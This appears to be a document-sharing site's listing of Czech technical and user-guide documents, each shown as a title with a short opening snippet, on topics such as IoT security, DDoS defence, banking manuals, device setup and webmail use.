Bezpečnostní rizika chytrých spotřebičů a Internetu věcí Infotherma 2017 Patrick Zandl patrick.zandl@nic.cz 24.1.2017 Internet věcí a bezpečnost Internet věcí (IoT) začíná být všude IoT je připojené programovatelné
Zásady ochrany osobních údajů Garaventa Lift. Jaké osobní údaje Garaventa Lift shromažďuje?
Zásady ochrany osobních údajů Garaventa Lift Společnost Garaventa Accessibility AG a její dceřiné společnosti a pobočky (dále jen Garaventa Lift ) nesou odpovědnost za všechny webové stránky a počítačové
webmarketin Základní moduly aplikace
webmarketin Aplikace webmarketing je komplexní online nástroj určený pro podporu a řízení marketingu a CRM ve společnosti. Její součástí jsou webové ankety, SMS kampaně nebo newslettery, které lze spravovat
Problematika internetové bezpečnosti a obrany proti DDoS útokům. Ing. Tomáš Havlíček Produktový manažer
Problematika internetové bezpečnosti a obrany proti DDoS útokům Ing. Tomáš Havlíček Produktový manažer 11 11 2015 Účast v projektu FENIX ČD-T a internetová bezpečnost ČDT-MONITOR detekce bezpečnostních
Příručka Google Cloud Print
Příručka Google Cloud Print Verze A CZE Definice poznámek V celé příručce uživatele je použit následující styl poznámek: Poznámky uvádějí, jak reagovat na situaci, která může nastat, nebo poskytují tipy,
Informace o poštovním provozu na serveru mail.ktkadan.cz a stručný návod na použití OpenWebMailu
Informace o poštovním provozu na serveru mail.ktkadan.cz a stručný návod na použití OpenWebMailu 1. Obecné informace Příchozí zprávy se ukládají do vaší schránky na serveru mail.ktkadan.cz. Tuto schránku
Šifrování Autentizace Bezpečnostní slabiny. Bezpečnost. Lenka Kosková Třísková, NTI TUL. 22. března 2013
Šifrování Autentizace ní slabiny 22. března 2013 Šifrování Autentizace ní slabiny Technologie Symetrické vs. asymetrické šifry (dnes kombinace) HTTPS Funguje nad HTTP Šifrování s pomocí SSL nebo TLS Šifrování
Analýza a zabezpečení počítačové sítě
www.redtoo.com 30.09.2015 Page 1 Analýza a zabezpečení počítačové sítě Firewall, IPS, Netflow Ing. Jakub Žák, redtoo www.redtoo.com 30.09.2015 Page 2 Základní informace o síti Z čeho se počítačová síť
Registrační číslo projektu: CZ.1.07/1.5.00/34.0553 Elektronická podpora zkvalitnění výuky CZ.1.07 Vzděláním pro konkurenceschopnost
Registrační číslo projektu: CZ.1.07/1.5.00/34.0553 Elektronická podpora zkvalitnění výuky CZ.1.07 Vzděláním pro konkurenceschopnost Projekt je realizován v rámci Operačního programu Vzdělávání pro konkurence
Manuál pro správu uživatelských účtů aplikace MoneyWeb
Manuál pro správu uživatelských účtů aplikace MoneyWeb Poznámka: Tento manuál byl vytvořen za použití Microsoft Internet Exploreru verze 6 cs. Používáte-li jinou verzi MS Internet Exploreru nebo jiný prohlížeč
Filter online threats off your network
Filter online threats off your network Cloud DNS resolver Pět minut - změna konfigurace DNS resolverů Bez nutnosti jakékoliv instalace ve vlastní infrastruktuře On-premise DNS resolver Maximálně jednotky
Po prvním spuštění Chrome Vás prohlížeč vyzve, aby jste zadali své přihlašovací údaje do účtu Google. Proč to udělat? Máte několik výhod:
Internetový prohlížeč CHROME Pro správné fungování veškerých funkcionalit, které nám nástroje společnosti Google nabízí, je dobré používat prohlížeč Chrome. Jeho instalaci je možné provést z webové adresy:
Nastavení tabletu Apple ipad
Nastavení tabletu Apple ipad Tablet Apple ipad, zakoupený v prodejní síti společnosti T-Mobile Czech Republic a.s., má potřebné parametry pro použití T-Mobile služeb již přednastaveny. Pokud je potřeba
Výtisk č.: Počet listů 19. Přílohy: 0 ÚZIS ČR. Role žadatel - postup
ÚZIS ČR Palackého nám. 4 128 01 Praha 2 - Nové Město Výtisk č.: Počet listů 19 Přílohy: 0 ÚZIS ČR Role žadatel - postup Projekt - ereg - Úprava rezortních registrů a konsolidace rezortních dat v návaznosti
Příručka pro uživatele ČSOB InternetBanking 24 a ČSOB BusinessBanking 24 Online s čipovou kartou
Příručka pro uživatele ČSOB InternetBanking 24 a ČSOB BusinessBanking 24 Online s čipovou kartou Člen skupiny KBC Obsah 1 Úvod podmínky pro úspěšné přihlášení do služby... 3 2 Instalace SecureStore...
VY_32_INOVACE_IKTO2_1960 PCH
VY_32_INOVACE_IKTO2_1960 PCH VÝUKOVÝ MATERIÁL V RÁMCI PROJEKTU OPVK 1.5 PENÍZE STŘEDNÍM ŠKOLÁM ČÍSLO PROJEKTU: CZ.1.07/1.5.00/34.0883 NÁZEV PROJEKTU: ROZVOJ VZDĚLANOSTI ČÍSLO ŠABLONY: III/2 DATUM VYTVOŘENÍ:
Platební systém XPAY [www.xpay.cz]
Platební systém XPAY [www.xpay.cz] popis platebních metod Bankovní převod a Poštovní poukázka v ČR a SR a průběhu platby verze 19 / 29.2.2012 1 Obsah 1 Přehled platebních metod 3 1.1 Bankovní převod v
XTB VPS. XTB Virtual Private Server manuál
XTB VPS XTB Virtual Private Server manuál Poslední aktualizace: 12/9/2012 Obsah manuálu 1 Úvod... 3 2 Správa serveru... 3 2.1 Přihlášení do administrace serveru... 3 2.2 Karta Obecné... 4 2.2.1 Okno Akce
Provozní dokumentace. Seznam orgánů veřejné moci. Příručka pro běžného uživatele
Provozní dokumentace Seznam orgánů veřejné moci Příručka pro běžného uživatele Vytvořeno dne: 7. 7. 2011 Aktualizováno: 7. 6. 2017 Verze: 2.4 2017 MVČR Obsah Příručka pro běžného uživatele 1 Úvod...3 1.1
Bezpečné placení na Internetu
Bezpečné placení na Internetu Ondřej Caletka 5. prosince 2016 Uvedené dílo podléhá licenci Creative Commons Uveďte autora 3.0 Česko. Ondřej Caletka (CESNET, z. s. p. o.) Bezpečné placení na Internetu 5.
Nastavení telefonu Nokia Asha 311
Nastavení telefonu Nokia Asha 311 Telefon Nokia Asha 311, zakoupený v prodejní síti společnosti T-Mobile Czech Republic a.s., má potřebné parametry pro použití T-Mobile služeb již přednastaveny. Pokud
Bezpečnostní zásady. d) Disponent je povinen při používání čipové karty nebo USB tokenu, na nichž je
Bezpečnostní zásady Česká národní banka (ČNB) věnuje trvalou pozornost nadstandardnímu zabezpečení aplikace ABO-K internetové bankovnictví (dále jen ABO-K ), proto využívá moderní technologie pro ochranu
Jak nastavit poštu v síti SPKFree
Jak nastavit poštu v síti SPKFree V poslední době se množí dotazy kolem pošty. Ti, kteří je kladou jsou bohužel ztraceni a vůbec nechápou základní věci. Ti, kteří odpovídají šílí, jak někdo může nevědět
Střední odborná škola a Střední odborné učiliště, Hořovice
Kód DUM : VY_32_INOVACE_DYN.1.15 Název materiálu: Anotace Autor Jazyk Očekávaný výstup 15 PHP- funkce mail() v PHP odesílání e-mailu pomocí dynamické stránky DUM je námětem k řešení jednoduché mailové